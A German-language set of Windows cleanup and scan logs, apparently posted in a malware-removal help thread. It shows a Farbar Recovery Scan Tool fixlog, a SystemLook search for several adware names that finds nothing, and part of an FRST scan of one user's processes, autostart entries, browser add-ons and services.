HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{FEF6D7E1-87B1-4C95-BF83-6A6D4A3AF143} => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{FEF6D7E1-87B1-4C95-BF83-6A6D4A3AF143} => Schlüssel erfolgreich entfernt
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\gwx\refreshgwxcontent => Schlüssel erfolgreich entfernt
========= dir "%ProgramFiles%" =========
Volume in Laufwerk C: hat keine Bezeichnung.
Volumeseriennummer: B0DD-0F8A
Verzeichnis von C:\Program Files
22.05.2017 18:25 <DIR> .
22.05.2017 18:25 <DIR> ..
26.04.2015 13:26 <DIR> Adblock Plus for IE
17.05.2017 21:18 <DIR> AMD
07.05.2017 17:13 <DIR> ASUS
05.02.2017 21:17 <DIR> Bitdefender
23.05.2017 18:19 <DIR> Bitdefender Agent
26.04.2015 15:41 <DIR> Canon
22.05.2017 18:19 <DIR> Common Files
07.05.2017 17:14 <DIR> Intel
20.03.2017 06:41 <DIR> Internet Explorer
22.05.2017 18:25 <DIR> Malwarebytes
24.05.2015 12:10 <DIR> Microsoft Xbox 360 Accessories
07.05.2017 18:09 <DIR> MSBuild
07.05.2017 17:13 <DIR> Realtek
07.05.2017 18:09 <DIR> Reference Assemblies
24.05.2015 14:30 <DIR> Rockstar Games
05.02.2017 21:06 <DIR> Unlocker
03.05.2017 17:22 <DIR> UNP
05.02.2017 20:54 <DIR> VS Revo Group
20.03.2017 06:41 <DIR> Windows Defender
20.03.2017 06:43 <DIR> Windows Defender Advanced Threat Protection
07.05.2017 17:14 <DIR> Windows Mail
20.03.2017 06:41 <DIR> Windows Media Player
18.03.2017 23:03 <DIR> Windows Multimedia Platform
07.05.2017 17:20 <DIR> Windows NT
09.05.2017 23:04 <DIR> Windows Photo Viewer
18.03.2017 23:03 <DIR> Windows Portable Devices
18.03.2017 23:03 <DIR> Windows Security
18.03.2017 23:03 <DIR> WindowsPowerShell
24.05.2015 12:00 <DIR> WinRAR
0 Datei(en), 0 Bytes
31 Verzeichnis(se), 158.767.104.000 Bytes frei
========= Ende von CMD: =========
========= dir "%ProgramFiles(x86)%" =========
Volume in Laufwerk C: hat keine Bezeichnung.
Volumeseriennummer: B0DD-0F8A
Verzeichnis von C:\Program Files (x86)
22.05.2017 18:28 <DIR> .
22.05.2017 18:28 <DIR> ..
30.09.2016 17:46 <DIR> AMD
25.04.2015 07:04 <DIR> AMD AVT
07.05.2017 17:14 <DIR> ASUS
26.12.2015 16:08 <DIR> Battle.net
26.04.2015 15:42 <DIR> Canon
07.05.2017 17:14 <DIR> Common Files
25.04.2015 07:59 <DIR> CrystalDiskInfo
22.01.2017 16:12 <DIR> Drakonia Configurator
15.08.2015 16:49 <DIR> Ghostery
05.02.2017 20:50 <DIR> Google
25.04.2015 07:20 <DIR> Intel
20.03.2017 06:41 <DIR> Internet Explorer
29.01.2017 17:53 <DIR> Lavalys
05.02.2017 17:59 <DIR> linker
25.02.2017 13:10 <DIR> McAfee
19.05.2017 14:20 <DIR> Microsoft.NET
08.05.2017 21:19 <DIR> MonitorDriver
22.05.2017 18:14 <DIR> Mozilla Firefox
22.05.2017 18:20 <DIR> Mozilla Maintenance Service
07.05.2017 18:09 <DIR> MSBuild
22.08.2015 16:59 <DIR> Origin
22.08.2015 16:57 <DIR> Origin Games
30.11.2016 18:54 <DIR> PDF24
05.02.2017 18:36 <DIR> Qeqotion
05.02.2017 17:58 <DIR> Raptr
16.08.2015 13:40 <DIR> Realtek
07.05.2017 18:09 <DIR> Reference Assemblies
24.05.2015 14:30 <DIR> Rockstar Games
24.02.2016 19:36 <DIR> Samsung
26.04.2015 14:27 <DIR> Skype
21.05.2017 20:55 <DIR> Spybot - Search & Destroy 2
21.05.2017 21:36 <DIR> Steam
26.04.2015 14:25 <DIR> TeamSpeak 3 Client
26.04.2015 13:39 <DIR> Ubisoft
24.05.2015 14:30 <DIR> VS Revo Group
01.05.2017 12:44 <DIR> VulkanRT
20.03.2017 06:41 <DIR> Windows Defender
07.05.2017 17:14 <DIR> Windows Mail
20.03.2017 06:41 <DIR> Windows Media Player
18.03.2017 23:03 <DIR> Windows Multimedia Platform
18.03.2017 23:03 <DIR> Windows NT
09.05.2017 23:04 <DIR> Windows Photo Viewer
18.03.2017 23:03 <DIR> Windows Portable Devices
18.03.2017 23:03 <DIR> WindowsPowerShell
19.02.2017 12:30 <DIR> WISO
0 Datei(en), 0 Bytes
47 Verzeichnis(se), 158.766.522.368 Bytes frei
========= Ende von CMD: =========
========= dir "%ProgramData%" =========
Volume in Laufwerk C: hat keine Bezeichnung.
Volumeseriennummer: B0DD-0F8A
Verzeichnis von C:\ProgramData
26.04.2015 15:01 <DIR> .mono
05.02.2017 19:40 46.145 agent.1486316443.bdinstall.bin
05.02.2017 20:08 26.583 agent.1486318128.bdinstall.bin
05.02.2017 20:09 26.510 agent.1486318150.bdinstall.bin
05.02.2017 20:52 46.366 agent.1486320772.bdinstall.bin
05.02.2017 20:55 28.837 agent.1486320909.bdinstall.bin
05.02.2017 20:57 46.212 agent.1486321078.bdinstall.bin
05.02.2017 21:01 26.790 agent.1486321314.bdinstall.bin
05.02.2017 21:02 28.833 agent.1486321377.bdinstall.bin
05.02.2017 21:11 46.370 agent.1486321901.bdinstall.bin
09.02.2017 19:09 28.754 agent.1486660167.bdinstall.bin
08.03.2017 21:56 29.970 agent.update.1489002971.bdinstall.bin
01.05.2017 12:45 <DIR> AMD
25.04.2015 07:21 <DIR> ASUS
05.01.2016 19:09 <DIR> ATI
05.02.2017 17:58 <DIR> Avg
26.04.2015 13:35 <DIR> Battle.net
05.02.2017 19:52 <DIR> BDLogging
05.02.2017 20:28 <DIR> Bitdefender
05.02.2017 21:11 <DIR> Bitdefender Agent
05.02.2017 21:17 <DIR> Bitdefender Device Management
26.04.2015 13:38 <DIR> Blizzard Entertainment
12.02.2017 16:02 <DIR> Buhl Data Service GmbH
26.04.2015 15:42 <DIR> Canon IJ Network Tool
26.04.2015 15:41 <DIR> CanonIJWSpt
05.02.2017 21:15 381.546 cl.1486322005.bdinstall.bin
16.07.2016 13:47 <DIR> Comms
03.10.2016 18:50 <DIR> dbdata
05.02.2017 21:17 55.877 dm.1486322271.bdinstall.bin
07.02.2017 23:33 35.238 dm.1486503192.bdinstall.bin
22.08.2015 17:13 <DIR> Electronic Arts
29.03.2017 15:57 <DIR> elsterformular
25.04.2015 07:16 <DIR> Intel
22.05.2017 18:25 <DIR> Malwarebytes
09.02.2017 23:13 <DIR> McAfee
19.05.2017 14:20 <DIR> Microsoft Help
07.05.2017 21:26 <DIR> Microsoft OneDrive
25.04.2015 06:53 <DIR> Microsoft Toolkit
23.08.2015 17:45 <DIR> Origin
01.05.2017 12:17 <DIR> Package Cache
05.02.2017 21:11 <DIR> Panda Security
19.05.2017 14:20 <DIR> regid.1991-06.com.microsoft
24.02.2016 19:36 <DIR> Samsung
26.04.2015 14:27 <DIR> Skype
24.05.2015 13:01 <DIR> Socialclub
18.03.2017 23:03 <DIR> SoftwareDistribution
25.07.2015 12:29 <DIR> Solidshield
21.05.2017 20:54 <DIR> Spybot - Search & Destroy
24.05.2015 13:01 <DIR> Steam
07.05.2017 17:17 <DIR> USOPrivate
07.05.2017 17:17 <DIR> USOShared
20.03.2017 06:43 <DIR> WindowsHolographicDevices
01.03.2017 19:50 <DIR> {CA67D69C-7DCC-6137-7CD8-F928B38095A6}
14 Datei(en), 854.031 Bytes
39 Verzeichnis(se), 158.766.460.928 Bytes frei
========= Ende von CMD: =========
========= dir "%Appdata%" =========
Volume in Laufwerk C: hat keine Bezeichnung.
Volumeseriennummer: B0DD-0F8A
Verzeichnis von C:\Users\Dino\AppData\Roaming
23.05.2017 18:23 <DIR> .
23.05.2017 18:23 <DIR> ..
26.04.2015 15:01 <DIR> .mono
25.04.2015 06:35 <DIR> Adobe
26.04.2015 13:35 <DIR> AMD
25.04.2015 06:55 <DIR> ATI
26.04.2015 13:36 <DIR> Battle.net
05.02.2017 20:03 <DIR> Bitdefender
13.02.2016 12:34 <DIR> Buhl Data Service
02.11.2015 19:52 <DIR> Canon
22.01.2017 16:23 <DIR> discord
24.02.2017 12:45 <DIR> EasyAntiCheat
21.02.2016 17:08 <DIR> elsterformular
25.04.2015 07:16 <DIR> InstallShield
25.07.2015 10:49 <DIR> library_dir
25.04.2015 06:47 <DIR> Macromedia
22.01.2017 16:12 <DIR> MingGuan
15.08.2015 16:53 <DIR> Mozilla
22.08.2015 16:16 <DIR> Origin
05.02.2017 19:51 <DIR> QuickScan
29.12.2015 18:13 <DIR> Raptr
31.08.2015 18:08 <DIR> Samsung
02.09.2016 18:13 <DIR> Skype
19.02.2017 12:51 <DIR> Spotify
26.04.2015 15:01 <DIR> Steam
29.03.2017 15:50 <DIR> TeamViewer
26.04.2015 14:52 <DIR> TS3Client
25.07.2015 13:25 <DIR> Ubisoft
24.05.2015 12:00 <DIR> WinRAR
0 Datei(en), 0 Bytes
29 Verzeichnis(se), 158.766.403.584 Bytes frei
========= Ende von CMD: =========
========= dir "%LocalAppdata%" =========
Volume in Laufwerk C: hat keine Bezeichnung.
Volumeseriennummer: B0DD-0F8A
Verzeichnis von C:\Users\Dino\AppData\Local
23.05.2017 17:47 <DIR> .
23.05.2017 17:47 <DIR> ..
18.01.2016 18:14 <DIR> ActiveSync
19.02.2017 12:20 <DIR> Adobe
07.11.2016 18:25 <DIR> AMD
25.04.2015 06:55 <DIR> ATI
26.12.2015 16:18 <DIR> Battle.net
26.04.2015 13:35 <DIR> Blizzard Entertainment
12.02.2017 16:01 <DIR> Buhl
13.02.2016 12:34 <DIR> Buhl Data Service
17.09.2015 11:20 <DIR> CEF
26.04.2015 15:01 <DIR> Colossal Order
16.08.2015 13:53 <DIR> Comms
03.10.2016 12:54 <DIR> ConnectedDevicesPlatform
07.05.2017 21:24 <DIR> DBG
22.01.2017 15:26 <DIR> Discord
28.01.2017 16:51 <DIR> ElevatedDiagnostics
15.08.2015 16:49 <DIR> GhosteryConfig
22.11.2015 12:23 <DIR> Google
11.07.2015 10:40 <DIR> GWX
22.04.2017 19:40 <DIR> JDownloader v2.0
18.09.2015 12:19 <DIR> Macromedia
07.05.2017 17:17 <DIR> Microsoft
25.04.2015 17:25 <DIR> Microsoft Help
21.08.2015 17:13 <DIR> MicrosoftEdge
16.08.2015 01:05 <DIR> Mozilla
22.08.2015 14:38 <DIR> Origin
09.05.2017 21:32 <DIR> Packages
02.11.2015 19:58 <DIR> PDF24
22.08.2015 13:46 <DIR> PeerDistRepub
22.05.2017 18:28 <DIR> Programs
16.08.2015 13:45 <DIR> Publishers
27.01.2017 23:52 7.601 Resmon.ResmonCfg
24.05.2015 12:51 <DIR> Rockstar Games
26.04.2015 14:27 <DIR> Skype
19.02.2017 13:23 <DIR> Spotify
22.01.2017 15:26 <DIR> SquirrelTemp
16.08.2015 13:49 <DIR> Stardock
01.05.2017 10:53 <DIR> Steam
23.05.2017 18:22 <DIR> Temp
16.08.2015 13:45 <DIR> TileDataLayer
24.02.2017 12:54 <DIR> Ubisoft Game Launcher
03.05.2017 17:47 <DIR> UNP
25.04.2015 06:35 <DIR> VirtualStore
1 Datei(en), 7.601 Bytes
43 Verzeichnis(se), 158.766.346.240 Bytes frei
========= Ende von CMD: =========
========= dir "%CommonProgramFiles(x86)%" =========
Volume in Laufwerk C: hat keine Bezeichnung.
Volumeseriennummer: B0DD-0F8A
Verzeichnis von C:\Program Files (x86)\Common Files
07.05.2017 17:14 <DIR> .
07.05.2017 17:14 <DIR> ..
25.04.2015 07:04 <DIR> ATI Technologies
26.04.2015 13:38 <DIR> Blizzard Entertainment
25.04.2015 07:20 <DIR> InstallShield
19.05.2017 14:20 <DIR> Microsoft Shared
25.04.2015 07:16 <DIR> postureAgent
18.03.2017 23:03 <DIR> Services
05.02.2017 20:51 <DIR> Skype
01.05.2017 12:40 <DIR> Steam
20.03.2017 06:41 <DIR> System
0 Datei(en), 0 Bytes
11 Verzeichnis(se), 158.766.292.992 Bytes frei
========= Ende von CMD: =========
========= dir "%CommonProgramW6432%" =========
Volume in Laufwerk C: hat keine Bezeichnung.
Volumeseriennummer: B0DD-0F8A
Verzeichnis von C:\Program Files\Common Files
22.05.2017 18:19 <DIR> .
22.05.2017 18:19 <DIR> ..
07.05.2017 17:13 <DIR> ATI Technologies
05.02.2017 19:52 <DIR> Bitdefender
09.02.2017 19:08 <DIR> Intel
19.05.2017 14:20 <DIR> microsoft shared
18.03.2017 23:03 <DIR> Services
19.05.2017 14:20 <DIR> System
0 Datei(en), 0 Bytes
8 Verzeichnis(se), 158.766.235.648 Bytes frei
========= Ende von CMD: =========
========= dir "%UserProfile%" =========
Volume in Laufwerk C: hat keine Bezeichnung.
Volumeseriennummer: B0DD-0F8A
Verzeichnis von C:\Users\Dino
14.05.2017 22:59 <DIR> .
14.05.2017 22:59 <DIR> ..
10.05.2017 21:47 <DIR> Contacts
23.05.2017 18:23 <DIR> Desktop
07.05.2017 21:24 <DIR> Documents
07.05.2017 21:24 <DIR> Downloads
10.05.2017 21:47 <DIR> Favorites
10.05.2017 21:47 <DIR> Links
07.05.2017 21:24 <DIR> Music
23.05.2017 18:23 <DIR> OneDrive
07.05.2017 21:24 <DIR> Pictures
10.05.2017 21:47 <DIR> Saved Games
10.05.2017 21:47 <DIR> Searches
26.04.2015 14:32 <DIR> Tracing
07.05.2017 21:24 <DIR> Videos
0 Datei(en), 0 Bytes
15 Verzeichnis(se), 158.766.174.208 Bytes frei
========= Ende von CMD: =========
========= RemoveProxy: =========
HKU\S-1-5-21-3554052566-3312977812-1675691648-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => Wert erfolgreich entfernt
HKU\S-1-5-21-3554052566-3312977812-1675691648-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => Wert erfolgreich entfernt
========= Ende von RemoveProxy: =========
========= ipconfig /flushdns =========
Windows-IP-Konfiguration
Der DNS-Aufl”sungscache wurde geleert.
========= Ende von CMD: =========
========= netsh winsock reset =========
Der Winsock-Katalog wurde zurckgesetzt.
Sie mssen den Computer neu starten, um den Vorgang abzuschlieáen.
========= Ende von CMD: =========
=========== EmptyTemp: ==========
BITS transfer queue => 6578176 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 23722052 B
Java, Flash, Steam htmlcache => 9458 B
Windows/system/drivers => 13712566 B
Edge => 7492150 B
Chrome => 325000 B
Firefox => 17232432 B
Opera => 0 B
Temp, IE cache, history, cookies, recent:
Default => 6656 B
Users => 0 B
ProgramData => 0 B
Public => 0 B
systemprofile => 128 B
systemprofile32 => 128 B
LocalService => 22794 B
NetworkService => 125238 B
Dino => 44261836 B
RecycleBin => 277578 B
EmptyTemp: => 108.5 MB temporäre Dateien entfernt.
================================
Das System musste neu gestartet werden.
==== Ende von Fixlog 18:24:09 ====
Code:
ATTFilter SystemLook 30.07.11 by jpshortstuff
Log created at 18:27 on 23/05/2017 by Dino
Administrator - Elevation successful
========== folderfind ==========
Searching for "*Note-up*"
No folders found.
Searching for "*Kuaizip*"
No folders found.
Searching for "*Microleaves*"
No folders found.
Searching for "*Noobzo*"
No folders found.
Searching for "*SearchModule*"
No folders found.
Searching for "*DPower*"
No folders found.
Searching for "*BestCleaner*"
No folders found.
Searching for "*Spark*"
No folders found.
Searching for "*youndoo.com*"
No folders found.
========== regfind ==========
Searching for "Note-up"
No data found.
Searching for "Kuaizip"
No data found.
Searching for "Microleaves"
No data found.
Searching for "Noobzo"
No data found.
Searching for "SearchModule"
No data found.
Searching for "DPower"
No data found.
Searching for "BestCleaner"
No data found.
Searching for "Spark"
No data found.
Searching for "youndoo.com"
No data found.
-= EOF =-
Code:
ATTFilter Untersuchungsergebnis von Farbar Recovery Scan Tool (FRST) (x64) Version: 22-05-2017
durchgeführt von Dino (Administrator) auf **** (23-05-2017 18:33:28)
Gestartet von C:\Users\Dino\Desktop
Geladene Profile: Dino (Verfügbare Profile: Dino)
Platform: Windows 10 Pro Version 1703 (X64) Sprache: Deutsch (Deutschland)
Internet Explorer Version 11 (Standard-Browser: FF)
Start-Modus: Normal
Anleitung für Farbar Recovery Scan Tool: hxxp://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/
==================== Prozesse (Nicht auf der Ausnahmeliste) =================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Prozess geschlossen. Die Datei wird nicht verschoben.)
(Bitdefender) C:\Program Files\Bitdefender\Bitdefender 2017\vsserv.exe
(AMD) C:\Windows\System32\atiesrxx.exe
(AMD) C:\Windows\System32\atieclxx.exe
() C:\Program Files (x86)\ASUS\AXSP\1.01.02\atkexComSvc.exe
() C:\Windows\SysWOW64\ASGT.exe
(ASUSTeK Computer Inc.) C:\Program Files (x86)\ASUS\AAHM\1.00.22\aaHMSvc.exe
(Intel(R) Corporation) C:\Program Files\Intel\iCLS Client\HeciServer.exe
(ASUSTeK Computer Inc.) C:\Program Files (x86)\ASUS\AsusFanControlService\1.06.13\AsusFanControlService.exe
(Bitdefender) C:\Program Files\Bitdefender Agent\ProductAgentService.exe
(Bitdefender) C:\Program Files\Bitdefender\Bitdefender 2017\updatesrv.exe
(DEVGURU Co., LTD.) C:\Program Files (x86)\Samsung\USB Drivers\27_ssconn\conn\ss_conn_service.exe
(Bitdefender) C:\Program Files\Bitdefender\Bitdefender 2017\vsservp.exe
(Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe
(ASUSTeK Computer Inc.) C:\Program Files (x86)\ASUS\AI Suite III\AISuite3.exe
() C:\Program Files (x86)\ASUS\AI Suite III\DIP4\DIPAwayMode\DipAwayMode.exe
(Advanced Micro Devices, Inc.) C:\Program Files\AMD\CNext\CNext\RadeonSettings.exe
(ASUS) C:\Program Files (x86)\ASUS\GPU Tweak\Monitor.exe
() C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.15.597.0_x64__kzf8qxf38zg5c\SkypeHost.exe
(Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
(Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
(Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
() C:\Program Files (x86)\ASUS\AI Suite III\AsusMiniBar.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MSASCuiL.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe
(Microsoft Corporation) C:\Program Files\Microsoft Xbox 360 Accessories\XBoxStat.exe
(Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\mbamtray.exe
(Spotify Ltd) C:\Users\Dino\AppData\Roaming\Spotify\SpotifyWebHelper.exe
(Samsung) C:\Program Files (x86)\Samsung\Smart Switch PC\SmartSwitchPDLR.exe
(Samsung Electronics.) C:\Program Files (x86)\Samsung\Samsung Magician\Samsung Magician.exe
(CANON INC.) C:\Program Files (x86)\Canon\IJ Network Scanner Selector EX\CNMNSST.exe
(Geek Software GmbH) C:\Program Files (x86)\PDF24\pdf24.exe
() C:\Program Files (x86)\Drakonia Configurator\hid.exe
() C:\Program Files (x86)\Drakonia Configurator\trayicon.exe
(Bitdefender) C:\Program Files\Bitdefender\Bitdefender 2017\bdagent.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\WinSxS\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.15063.0_none_1a733a82001933cc\TiWorker.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
==================== Registry (Nicht auf der Ausnahmeliste) ====================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt. Die Datei wird nicht verschoben.)
HKLM\...\Run: [SecurityHealth] => C:\Program Files\Windows Defender\MSASCuiL.exe [629152 2017-03-18] (Microsoft Corporation)
HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [8466136 2015-04-30] (Realtek Semiconductor)
HKLM\...\Run: [XboxStat] => C:\Program Files\Microsoft Xbox 360 Accessories\XboxStat.exe [825184 2009-09-30] (Microsoft Corporation)
HKLM\...\Run: [Malwarebytes TrayApp] => C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\mbamtray.exe [3146704 2017-05-09] (Malwarebytes)
HKLM-x32\...\Run: [IJNetworkScannerSelectorEX] => C:\Program Files (x86)\Canon\IJ Network Scanner Selector EX\CNMNSST.exe [438888 2014-01-15] (CANON INC.)
HKLM-x32\...\Run: [PDFPrint] => C:\Program Files (x86)\PDF24\pdf24.exe [210432 2016-07-05] (Geek Software GmbH)
HKLM-x32\...\Run: [GamingMouse] => C:\Program Files (x86)\Drakonia Configurator\hid.exe [248832 2013-10-29] ()
HKU\S-1-5-21-3554052566-3312977812-1675691648-1001\...\Run: [Spotify Web Helper] => C:\Users\Dino\AppData\Roaming\Spotify\SpotifyWebHelper.exe [1446000 2017-02-19] (Spotify Ltd)
HKU\S-1-5-21-3554052566-3312977812-1675691648-1001\...\Run: [SmartSwitchPDLR.exe] => C:\Program Files (x86)\Samsung\Smart Switch PC\SmartSwitchPDLR.exe [1037992 2017-02-07] (Samsung)
HKU\S-1-5-21-3554052566-3312977812-1675691648-1001\...\MountPoints2: {ab244902-eb0d-11e4-8257-806e6f6e6963} - "E:\autorun.exe"
==================== Internet (Nicht auf der Ausnahmeliste) ====================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Eintrag entfernt oder auf den Standardwert zurückgesetzt, wenn es sich um einen Registryeintrag handelt.)
Tcpip\Parameters: [DhcpNameServer] 192.168.0.1
Tcpip\Parameters: [NameServer] 8.8.8.8
Tcpip\..\Interfaces\{06211c3c-22f5-4f8b-938a-39928700d64a}: [NameServer] 8.8.8.8
Tcpip\..\Interfaces\{06211c3c-22f5-4f8b-938a-39928700d64a}: [DhcpNameServer] 8.8.8.8
Tcpip\..\Interfaces\{0784e829-3340-11e7-867e-806e6f6e6963}: [NameServer] 8.8.8.8
Tcpip\..\Interfaces\{142b5a4e-79e0-4f08-bda2-eaa2ab4e2034}: [NameServer] 8.8.8.8
Tcpip\..\Interfaces\{142b5a4e-79e0-4f08-bda2-eaa2ab4e2034}: [DhcpNameServer] 8.8.8.8
Tcpip\..\Interfaces\{46b778ab-edfa-42f3-91a9-8cdd864f74fe}: [NameServer] 8.8.8.8
Tcpip\..\Interfaces\{7340d9b1-829b-408c-bec7-3deae2933b18}: [NameServer] 8.8.8.8
Tcpip\..\Interfaces\{8718928d-cbeb-45ea-a621-800a9249001d}: [NameServer] 8.8.8.8
Tcpip\..\Interfaces\{ad8bd387-ecee-4a14-a4a7-473f0543f3ef}: [NameServer] 8.8.8.8
Tcpip\..\Interfaces\{ad8bd387-ecee-4a14-a4a7-473f0543f3ef}: [DhcpNameServer] 8.8.8.8
Tcpip\..\Interfaces\{b99ccfae-f682-4e7e-b110-ad59dc2334c2}: [NameServer] 8.8.8.8
Tcpip\..\Interfaces\{be8f98fe-7eb3-471d-87c5-3d35bdb361e0}: [NameServer] 8.8.8.8
Tcpip\..\Interfaces\{be8f98fe-7eb3-471d-87c5-3d35bdb361e0}: [DhcpNameServer] 192.168.0.1
Internet Explorer:
==================
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKU\S-1-5-21-3554052566-3312977812-1675691648-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://google.de/
BHO: Bitdefender-Geldbörse -> {1DAC0C53-7D23-4AB3-856A-B04D98CD982A} -> C:\Program Files\Bitdefender\Bitdefender 2017\pmbxie.dll [2017-04-24] (Bitdefender)
BHO: Canon Easy-WebPrint EX BHO -> {3785D0AD-BFFF-47F6-BF5B-A587C162FED9} -> C:\Program Files\Canon\Easy-WebPrint EX\ewpexbho.dll [2014-07-07] (CANON INC.)
BHO: Ghostery Plugin -> {6BF739DD-3323-4C6A-975B-C7E00A50B154} -> C:\Program Files (x86)\Ghostery\bin\ghostery64.dll [2015-01-23] (Ghostery, Inc.)
BHO: Adblock Plus for IE Browser Helper Object -> {FFCB3198-32F3-4E8B-9539-4324694ED664} -> C:\Program Files\Adblock Plus for IE\AdblockPlus64.dll [2015-02-25] (Eyeo GmbH)
BHO-x32: Bitdefender-Geldbörse -> {1DAC0C53-7D23-4AB3-856A-B04D98CD982A} -> C:\Program Files\Bitdefender\Bitdefender 2017\Antispam32\pmbxie.dll [2017-04-24] (Bitdefender)
BHO-x32: Canon Easy-WebPrint EX BHO -> {3785D0AD-BFFF-47F6-BF5B-A587C162FED9} -> C:\Program Files (x86)\Canon\Easy-WebPrint EX\ewpexbho.dll [2014-07-07] (CANON INC.)
BHO-x32: Ghostery Plugin -> {6BF739DD-3323-4C6A-975B-C7E00A50B154} -> C:\Program Files (x86)\Ghostery\bin\ghostery.dll [2015-01-23] (Ghostery, Inc.)
BHO-x32: Adblock Plus for IE Browser Helper Object -> {FFCB3198-32F3-4E8B-9539-4324694ED664} -> C:\Program Files\Adblock Plus for IE\AdblockPlus32.dll [2015-02-25] (Eyeo GmbH)
Toolbar: HKLM - Canon Easy-WebPrint EX - {759D9886-0C6F-4498-BAB6-4A5F47C6C72F} - C:\Program Files\Canon\Easy-WebPrint EX\ewpexhlp.dll [2014-07-07] (CANON INC.)
Toolbar: HKLM - Bitdefender-Geldbörse - {1DAC0C53-7D23-4AB3-856A-B04D98CD982A} - C:\Program Files\Bitdefender\Bitdefender 2017\pmbxie.dll [2017-04-24] (Bitdefender)
Toolbar: HKLM-x32 - Canon Easy-WebPrint EX - {759D9886-0C6F-4498-BAB6-4A5F47C6C72F} - C:\Program Files (x86)\Canon\Easy-WebPrint EX\ewpexhlp.dll [2014-07-07] (CANON INC.)
Toolbar: HKLM-x32 - Bitdefender-Geldbörse - {1DAC0C53-7D23-4AB3-856A-B04D98CD982A} - C:\Program Files\Bitdefender\Bitdefender 2017\Antispam32\pmbxie.dll [2017-04-24] (Bitdefender)
FireFox:
========
FF ProfilePath: C:\Users\Dino\AppData\Roaming\Mozilla\Firefox\Profiles\rcgkbgt3.default-1489247668614 [2017-05-23]
FF Homepage: Mozilla\Firefox\Profiles\rcgkbgt3.default-1489247668614 -> google.de/
FF HKLM\...\Firefox\Extensions: [bdwteffv20@bitdefender.com] - C:\Program Files\Bitdefender\Bitdefender 2017\antispam32\bdwteff
FF Extension: (Bitdefender Wallet) - C:\Program Files\Bitdefender\Bitdefender 2017\antispam32\bdwteff [2017-05-01]
FF HKLM\...\Thunderbird\Extensions: [bdThunderbird@bitdefender.com] - C:\Program Files\Bitdefender\Bitdefender 2017\bdtbext
FF Extension: (Bitdefender Antispam Toolbar) - C:\Program Files\Bitdefender\Bitdefender 2017\bdtbext [2017-01-19] [ist nicht signiert]
FF HKLM-x32\...\Firefox\Extensions: [bdwteffv20@bitdefender.com] - C:\Program Files\Bitdefender\Bitdefender 2017\antispam32\bdwteff
FF HKLM-x32\...\Thunderbird\Extensions: [bdThunderbird@bitdefender.com] - C:\Program Files\Bitdefender\Bitdefender 2017\bdtbext
FF Plugin: @adobe.com/FlashPlayer -> C:\WINDOWS\system32\Macromed\Flash\NPSWF64_25_0_0_171.dll [2017-05-12] ()
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\WINDOWS\SysWOW64\Macromed\Flash\NPSWF32_25_0_0_171.dll [2017-05-12] ()
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=4.0.5 -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll [2013-09-16] (Intel Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2013-09-16] (Intel Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-05-01] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-05-01] (Google Inc.)
Chrome:
=======
CHR DefaultProfile: ChromeDefaultData
CHR HKLM-x32\...\Chrome\Extension: [gannpgaobkkhmpomoijebaigcapoeebl] - hxxps://clients2.google.com/service/update2/crx
==================== Dienste (Nicht auf der Ausnahmeliste) ====================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
R2 asComSvc; C:\Program Files (x86)\ASUS\AXSP\1.01.02\atkexComSvc.exe [936728 2013-07-04] ()
R2 ASGT; C:\Windows\SysWOW64\ASGT.exe [55296 2012-01-17] () [Datei ist nicht signiert]
R2 asHmComSvc; C:\Program Files (x86)\ASUS\AAHM\1.00.22\aaHMSvc.exe [954648 2014-09-09] (ASUSTeK Computer Inc.)
